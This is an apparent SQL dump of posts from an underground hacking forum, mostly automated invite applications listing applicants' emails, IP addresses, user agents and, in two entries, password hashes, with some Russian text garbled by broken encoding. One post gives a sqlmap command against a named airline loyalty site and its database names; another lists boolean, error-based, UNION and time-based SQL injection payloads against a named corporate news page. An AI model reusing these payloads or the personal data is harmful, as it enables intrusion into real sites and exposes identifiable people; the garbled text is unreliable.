'[SIZE=\'4\'][COLOR=\'Sienna\']Arnold[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: a-rnold@default.rs\n[b]e-mail[/b]: incognito.pulse5000@gmail.com\n[b]Info[/b]: Hello, let me introduce my self, got skill in coding. Doing swf\'s. Also im selling traffic.\r\nMy other accounts:\r\nDK- https://darkode.com/profile.php?mode=viewprofile&u=1627\r\nExploit- https://exploit.in/forum/index.php?showuser=54732\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 108.59.13.44\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/33.1.0.0 Chrome/33.0.1750.152 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://arnold.af.mil | arnold.af.mil \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1959, 1668, 0, 'Invite', 2, '{$name}', 1410205047, '[SIZE=\'4\'][COLOR=\'Sienna\']Mruoss[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: mauisanell@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 174.127.99.214\n[*][b]real ip[/b]: 174.127.99.214\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://design.cmu.edu/user/852 | http://design.cmu.edu/user/852 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1960, 1666, 1953, 'ropertus', 33, '', 1410209742, 'I can help you with this. PM me or jabber.', 1, 1, '', 0, 1, 0, 0, 0), (1961, 1669, 0, 'Invite', 2, '{$name}', 1410209872, '[SIZE=\'4\'][COLOR=\'Sienna\']towel[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 634665240\n[b]e-mail[/b]: towel@i2pmail.org\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 193.150.121.66\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : towel : pwn3rr@gmail.com : 24.126.46.154 : 49f3632cb51c72332fc73d1245e5b2b7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1962, 1670, 0, 'Invite', 2, '{$name}', 1410217869, '[SIZE=\'4\'][COLOR=\'Sienna\']0wner[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: errorreport53@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.59.47.33\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://vk.com/pages?oid=-377163&p=0wner | https://vk.com/pages?oid=-377163&p=0wner \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1963, 1671, 0, 'null', 9, 'Sql velocityfrequentflyer.com', 1410233668, '[QUOTE]velocityfrequentflyer.com[/QUOTE]\r\n\r\nsqlmap -u \"http://www.velocityfrequentflyer.com/apps/velocity/faq/article.php?id=416\" --dbs\r\n\r\ntime-based blind\r\n\r\nÑð÷ы ýõ òÑÂõ ôþÑÂтðû\r\n\r\n[QUOTE]\r\ninformation_schema\r\n VOZkb\r\n VOZkb_upgrade\r\n vausphpkb\r\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1964, 1672, 0, 'null', 9, 'enterprise-news.alcatel-lucent.com', 1410233808, '[QUOTE][url]http://enterprise-news.alcatel-lucent.com/v1/TEMPLATES/doc.php?doc_ID=1857&rubrique_ID=883&rubLimit=[/url] [/QUOTE]\n\nßðрðüõтр rubrique_ID\nÞôýð ñô 1\n\n[QUOTE]\nPlace: GET\nParameter: rubrique_ID\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: doc_ID=1857&rubrique_ID=883 AND 9553=9553&rubLimit=\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause\n Payload: doc_ID=1857&rubrique_ID=883 AND (SELECT 7474 FROM(SELECT COUNT(*),CONCAT(0x716d6a6471,(SELECT (CASE WHEN (7474=7474) THEN 1 ELSE 0 END)),0x716f$\n\n Type: UNION query\n Title: MySQL UNION query (NULL) - 1 column\n Payload: doc_ID=1857&rubrique_ID=883 UNION ALL SELECT CONCAT(0x716d6a6471,0x79514174487272456945,0x716f6d6c71)#&rubLimit=\n\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: doc_ID=1857&rubrique_ID=883 AND SLEEP(5)&rubLimit=\n---\nweb server operating system: Linux Ubuntu 10.04 (Lucid Lynx)\nweb application technology: PHP 5.3.2, Apache 2.2.14\nback-end DBMS: MySQL 5.0\navailable databases [1]:\n[*] 1\n\nsqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n---\nPlace: GET\nParameter: rubrique_ID\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: doc_ID=1857&rubrique_ID=883 AND 9553=9553&rubLimit=\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause\n Payload: doc_ID=1857&rubrique_ID=883 AND (SELECT 7474 FROM(SELECT COUNT(*),CONCAT(0x716d6a6471,(SELECT (CASE WHEN (7474=7474) THEN 1 ELSE 0 END)),0x716f$\n\n Type: UNION query\n Title: MySQL UNION query (NULL) - 1 column\n Payload: doc_ID=1857&rubrique_ID=883 UNION ALL SELECT CONCAT(0x716d6a6471,0x79514174487272456945,0x716f6d6c71)#&rubLimit=\n\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: doc_ID=1857&rubrique_ID=883 AND SLEEP(5)&rubLimit=\n---\nweb server operating system: Linux Ubuntu 10.04 (Lucid Lynx)\nweb application technology: PHP 5.3.2, Apache 2.2.14\nback-end DBMS: MySQL 5.0\nsqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n---\nPlace: GET\nParameter: rubrique_ID\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: doc_ID=1857&rubrique_ID=883 AND 9553=9553&rubLimit=\n\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1966, 1673, 0, 'Invite', 2, '{$name}', 1410246132, '[SIZE=\'4\'][COLOR=\'Sienna\']lamp44[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: lamp_rad@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.220.69.124\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1965, 1658, 1942, 'null', 9, '', 1410234541, 'ÕÑÂть чõóþ øýтøрõÑÂýþóþ ýð ftp? Úтþ-тþ ÑÂûøòðû?', 1, 1, '', 0, 1, 0, 0, 0), (1968, 1675, 0, 'Invite', 2, '{$name}', 1410281798, '[SIZE=\'4\'][COLOR=\'Sienna\']Gold.V!per[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: yosef.kazemian@ICQ.com\n[b]e-mail[/b]: crazy.hacke3r@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.250.47.21\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; rv:31.0) Gecko/20100101 Firefox/31.0 AlexaToolbar/alxf-2.21\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1972, 1677, 0, 'Invite', 2, '{$name}', 1410343238, '[SIZE=\'4\'][COLOR=\'Sienna\']ovr[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: skype izaets28rus\n[b]e-mail[/b]: talk@dmtry.me\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 159.255.2.203\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2145.4 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ovr.org | ovr.org \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1973, 1678, 0, 'Invite', 2, '{$name}', 1410352098, '[SIZE=\'4\'][COLOR=\'Sienna\']nyu[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123456\n[b]e-mail[/b]: cashhazard7@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.55.63.253\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1974, 1679, 0, 'Invite', 2, '{$name}', 1410358171, '[SIZE=\'4\'][COLOR=\'Sienna\']Enigma[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: d0lus@jabber.org\n[b]e-mail[/b]: dolus@mail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 93.114.44.88\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Enigma : dem09@bk.ru : 62.109.191.118 : 963458ab559f450b5f8ccdca833bd91a\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://enigma.com | enigma.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1979, 1681, 0, 'Invite', 2, '{$name}', 1410383376, '[SIZE=\'4\'][COLOR=\'Sienna\']Dell-Pc[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: ali.ahmad1393@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.80.186.107\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1980, 1682, 0, 'Invite', 2, '{$name}', 1410387870, '[SIZE=\'4\'][COLOR=\'Sienna\']emmek[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: emmek11@live.it\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.44.1.123\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.gimptalk.com/index.php?/user/...emmek/page... | http://www.gimptalk.com/index.php?/user/...emmek/page... \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1982, 1683, 0, 'Invite', 2, '{$name}', 1410397562, '[SIZE=\'4\'][COLOR=\'Sienna\']T0XID0[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: mani911call@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 91.235.168.178\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://t0xid0.blogspot.com | t0xid0.blogspot.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1984, 1685, 0, 'w0rm', 1, 'GitHub account', 1410402805, 'Ãâ€Ã¾Ã±Ã°Ã²Ã¸Ã» рõÿþ÷øтþрøù ýð óøт хðñõ, úþô ñуôу òыúûðôыòðть тþûьúþ тð чтþ-ñы ýø чõóþ ýõ ÿþтõрÑÂûþÑÂÑŒ, рõÿþ÷øтþрøø ÑÂúрытыõ.\r\n[url]https://github.com/w0rmIN/[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1985, 1685, 1984, 'null', 9, '', 1410406659, '[QUOTE=w0rm;1984]Ãâ€Ã¾Ã±Ã°Ã²Ã¸Ã» рõÿþ÷øтþрøù ýð óøт хðñõ, úþô ñуôу òыúûðôыòðть тþûьúþ тð чтþ-ñы ýø чõóþ ýõ ÿþтõрÑÂûþÑÂÑŒ, рõÿþ÷øтþрøø ÑÂúрытыõ.\r\n[url]https://github.com/w0rmIN/[/url][/QUOTE]\r\n\r\nÚþô чõóþ?', 1, 1, '', 0, 1, 0, 0, 0), (1986, 1685, 1984, 'w0rm', 1, '', 1410407419, 'ò цõûþü úþô, þт ÑÂòþøх ýðрðñþтþú ø ôþ ÑÂûøтых óþрцõò.\nüы тут ñыòðõт у÷úøü úруóþü õщõ ø ÿрþóрðüüøруõü)', 1, 0, '', 0, 1, 0, 0, 0), (1987, 1685, 1984, 'null', 9, '', 1410408827, 'ßþôÿøÑÂðÃȄÂÑÂ))', 1, 1, '', 0, 1, 0, 0, 0), (1988, 1685, 1984, 'w0rm', 1, '', 1410409907, 'ÿрøþñщøû ú ÿрøòðтýыü рð÷рðñþтúðü))', 1, 0, '', 0, 1, 0, 0, 0), (1990, 1686, 0, 'Invite', 2, '{$name}', 1410445714, '[SIZE=\'4\'][COLOR=\'Sienna\']IceWolfBiH[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 551373815\n[b]e-mail[/b]: icewolfbih@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.176.173.103\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://icewolfbih.planetsoho.com | icewolfbih.planetsoho.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1994, 1101, 1173, 'unlog', 45, '', 1410520686, 'ÃÂõ ÑÂтþûьúþ ñðó, ÑÂúþûьúþ ÿûþхðѠýðÑÂтрþùúð.\nßþûь÷þòðтõûõù üþöýþ ÑÂüþтрõть ýõ ûþóøýÑÂÑÂÑŒ.\n[url]http://w0rm.in:8888/member.php?u=3[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1995, 1687, 0, 'Invite', 2, '{$name}', 1410524092, '[SIZE=\'4\'][COLOR=\'Sienna\']vky[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: spvikram001@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 182.70.9.85\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vky.tumblr.com | vky.tumblr.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1996, 1101, 1173, 'lumbricus', 39, 'Stored XSS - Market', 1410525132, 'Englaza: XSS/iFrame Injection (Market)\r\n\r\nMarket Vulnerable to Stored XSS and Iframe Inject.\r\n\r\nPOST: 